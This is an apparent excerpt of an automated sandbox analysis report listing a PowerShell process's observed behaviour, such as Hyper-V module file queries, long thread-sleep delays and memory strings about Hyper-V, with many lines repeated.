Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxmlJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xamlJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxmlJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xamlJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3964Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3177Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2052Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1084Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1529Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 948Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4417Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2605Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2056Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1485Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3964Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3177Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2052Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1084Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1529Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 948Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4417Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2605Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2056Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1485Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1124Thread sleep count: 3964 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4692Thread sleep count: 50 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1536Thread sleep count: 3177 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6988Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4144Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep count: 2052 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep count: 45 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4120Thread sleep count: 1084 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7004Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7004Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5088Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5408Thread sleep count: 1529 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5596Thread sleep count: 40 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6196Thread sleep count: 948 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7020Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5048Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6116Thread sleep count: 4417 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5068Thread sleep count: 49 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6220Thread sleep count: 2605 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7028Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4456Thread sleep count: 2056 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5668Thread sleep count: 54 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4456Thread sleep count: 1485 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7036Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1968Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5008Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1124Thread sleep count: 3964 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4692Thread sleep count: 50 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1536Thread sleep count: 3177 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6988Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4144Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep count: 2052 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep count: 45 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4120Thread sleep count: 1084 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7004Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7004Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5088Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5408Thread sleep count: 1529 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5596Thread sleep count: 40 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6196Thread sleep count: 948 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7020Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5048Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6116Thread sleep count: 4417 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5068Thread sleep count: 49 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6220Thread sleep count: 2605 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7028Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4456Thread sleep count: 2056 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5668Thread sleep count: 54 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4456Thread sleep count: 1485 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7036Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1968Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5008Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C799DE FindFirstFileNameTransactedW,12_2_00C799DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C79C6E FindFirstFileNameTransactedW,12_2_00C79C6E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C799DE FindFirstFileNameTransactedW,12_2_00C799DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C79C6E FindFirstFileNameTransactedW,12_2_00C79C6E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_07A8DEB8 GetSystemInfo,12_2_07A8DEB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_07A8DEB8 GetSystemInfo,12_2_07A8DEB8
Source: powershell.exe, 00000006.00000002.453514717.0000000005C91000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.467824625.0000000005B5C000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.438730786.0000000005098000.00000004.00000001.sdmpBinary or memory string: Hyper-V
Source: powershell.exe, 0000000E.00000003.460310051.0000000008BB9000.00000004.00000001.sdmpBinary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1s
Source: powershell.exe, 0000000F.00000002.466078174.00000000090E0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000006.00000002.453514717.0000000005C91000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.467824625.0000000005B5C000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.438730786.0000000005098000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmpBinary or memory string: f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: powershell.exe, 0000000E.00000003.465011614.0000000008B96000.00000004.00000001.sdmpBinary or memory string: FMSFT_NetEventVmNetworkAdatper.cdxml
Source: powershell.exe, 0000000E.00000003.465164775.0000000008BB9000.00000004.00000001.sdmpBinary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxmld1
Source: powershell.exe, 0000000E.00000003.460310051.0000000008BB9000.00000004.00000001.sdmpBinary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1d
Source: powershell.exe, 0000000F.00000002.466078174.00000000090E0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 0000000E.00000003.460310051.0000000008BB9000.00000004.00000001.sdmpBinary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
Source: powershell.exe, 0000000E.00000003.465011614.0000000008B96000.00000004.00000001.sdmpBinary or memory string: VMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: powershell.exe, 0000000F.00000002.466078174.00000000090E0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 0000000E.00000003.460310051.0000000008BB9000.00000004.00000001.sdmpBinary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dllO
Source: powershell.exe, 0000000F.00000002.466078174.00000000090E0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: powershell.exe, 00000006.00000002.453514717.0000000005C91000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.467824625.0000000005B5C000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.438730786.0000000005098000.00000004.00000001.sdmpBinary or memory string: Hyper-V
Source: powershell.exe, 0000000E.00000003.460310051.0000000008BB9000.00000004.00000001.sdmpBinary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1s
Source: powershell.exe, 0000000F.00000002.466078174.00000000090E0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
